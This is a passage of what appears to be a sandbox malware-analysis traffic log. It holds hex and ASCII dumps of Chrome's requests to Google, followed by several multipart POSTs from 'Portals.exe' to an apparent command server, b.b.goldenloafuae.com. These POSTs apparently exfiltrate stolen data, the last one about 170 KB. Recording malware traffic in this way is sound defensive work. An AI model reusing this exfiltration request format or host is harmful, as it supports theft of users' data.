                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c
                                                                                                                                                                                                    Data Ascii: -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 37 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f
                                                                                                                                                                                                    Data Ascii: -label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700247,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 41 64 3b 5f 2e 79 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 7a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                                                                                                                                    Data Ascii: fier: Apache-2.0\n*/\nvar Ad;_.yd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ad\u003dfunction(a){return new _.zd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC429INData Raw: 64 5c 75 30 30 33 64 4c 64 28 29 29 3b 72 65 74 75 72 6e 20 4d 64 7d 3b 5c 6e 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 4e 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4f 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4f 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 52 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69
                                                                                                                                                                                                    Data Ascii: d\u003dLd());return Md};\n_.Pd\u003dfunction(a){const b\u003d_.Nd();return new _.Od(b?b.createScriptURL(a):a)};_.Qd\u003dfunction(a){if(a instanceof _.Od)return a.i;throw Error(\"H\");};_.Sd\u003dfunction(a){if(Rd.test(a))return a};_.Td\u003dfunction(a){i
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 38 30 30 30 0d 0a 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 61 6c 6c 28 62 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 64 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 64 2e 6e 6f 6e 63 65 7c 7c 64 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 61 2c 62 2c 63 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 49 64 28 5f 2e 42 63 28 61 2c 62 29 29 7d
                                                                                                                                                                                                    Data Ascii: 8000.querySelector)\u003d\u003dnull?void 0:c.call(b,`${a}[nonce]`);return d\u003d\u003dnull?\"\":d.nonce||d.getAttribute(\"nonce\")||\"\"};_.Vd\u003dfunction(a,b,c){return _.tb(a,b,c)!\u003d\u003dvoid 0};\n_.Wd\u003dfunction(a,b){return _.Id(_.Bc(a,b))}
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 64 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 65 5b 64 5d 2c 63 29 3a 5f 2e 4a 64 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 4a 64 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 64 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72 5c 22 2c 68 65 69 67 68 74
                                                                                                                                                                                                    Data Ascii: "?a.htmlFor\u003dc:de.hasOwnProperty(d)?a.setAttribute(de[d],c):_.Jd(d,\"aria-\")||_.Jd(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};de\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder\",height


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    14192.168.2.449771142.250.186.1324432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC359OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    15192.168.2.449770142.250.186.1324432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCOipzgEIydHOAQi+1c4BCIHWzgEIwNjOAQjI3M4BCIrgzgEIruTOAQiL5c4B
                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC1303INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:04 GMT
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-maMCUOKgbYXs-9u_ev10OA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                    Accept-CH: Downlink
                                                                                                                                                                                                    Accept-CH: RTT
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC75INData Raw: 33 38 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 68 65 20 72 6f 6f 6b 69 65 20 6e 61 74 68 61 6e 20 66 69 6c 6c 69 6f 6e 22 2c 22 73 75 64 69 6b 73 68 61 20 6b 6f 6e 61 6e 6b 69 20 6d 69 73 73 69 6e 67 20 70 75 6e 74 61 20
                                                                                                                                                                                                    Data Ascii: 387)]}'["",["the rookie nathan fillion","sudiksha konanki missing punta
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC835INData Raw: 63 61 6e 61 22 2c 22 62 6c 6f 6f 64 20 6d 6f 6f 6e 20 74 6f 74 61 6c 20 6c 75 6e 61 72 20 65 63 6c 69 70 73 65 20 74 6f 6e 69 67 68 74 22 2c 22 6c 6f 74 74 65 72 79 20 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22 2c 22 70 61 6c 77 6f 72 6c 64 20 63 72 6f 73 73 70 6c 61 79 20 75 70 64 61 74 65 22 2c 22 77 65 61 74 68 65 72 20 73 74 6f 72 6d 73 20 61 6e 64 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 77 6f 72 64 6c 65 20 74 6f 64 61 79 20 6d 61 72 63 68 20 31 33 22 2c 22 64 61 74 61 20 62 72 65 61 63 68 20 73 65 74 74 6c 65 6d 65 6e 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a
                                                                                                                                                                                                    Data Ascii: cana","blood moon total lunar eclipse tonight","lottery mega millions powerball jackpot","palworld crossplay update","weather storms and tornadoes","wordle today march 13","data breach settlement"],["","","","","","","",""],[],{"google:clientdata":{"bpc":
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    16192.168.2.449772142.250.186.1324432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC393OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    Sec-Fetch-Storage-Access: active
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC970INHTTP/1.1 200 OK
                                                                                                                                                                                                    Version: 735763701
                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                    Accept-CH: Downlink
                                                                                                                                                                                                    Accept-CH: RTT
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:05 GMT
                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                    2025-03-13 17:03:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    17192.168.2.44978094.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:08 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8g4wln79r90hva16ppzc
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 505
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:03:08 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 38 67 34 77 6c 6e 37 39 72 39 30 68 76 61 31 36 70 70 7a 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 38 67 34 77 6c 6e 37 39 72 39 30 68 76 61 31 36 70 70 7a 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 38 67 34 77 6c 6e 37 39 72 39 30 68 76 61 31 36 70 70 7a 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------8g4wln79r90hva16ppzcContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------8g4wln79r90hva16ppzcContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------8g4wln79r90hva16ppzcCont
                                                                                                                                                                                                    2025-03-13 17:03:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:09 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:03:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    18192.168.2.44978194.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:09 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----5xbaimgln7qim7yctjwl
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:03:09 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------5xbaimgln7qim7yctjwlCont
                                                                                                                                                                                                    2025-03-13 17:03:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:10 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:03:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    19192.168.2.44978294.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:11 UTC297OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----00z58g4wtrqqiekno8yc
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 169765
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:03:11 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 30 30 7a 35 38 67 34 77 74 72 71 71 69 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 30 30 7a 35 38 67 34 77 74 72 71 71 69 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 30 30 7a 35 38 67 34 77 74 72 71 71 69 65 6b 6e 6f 38 79 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------00z58g4wtrqqiekno8ycContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------00z58g4wtrqqiekno8ycContent-Disposition: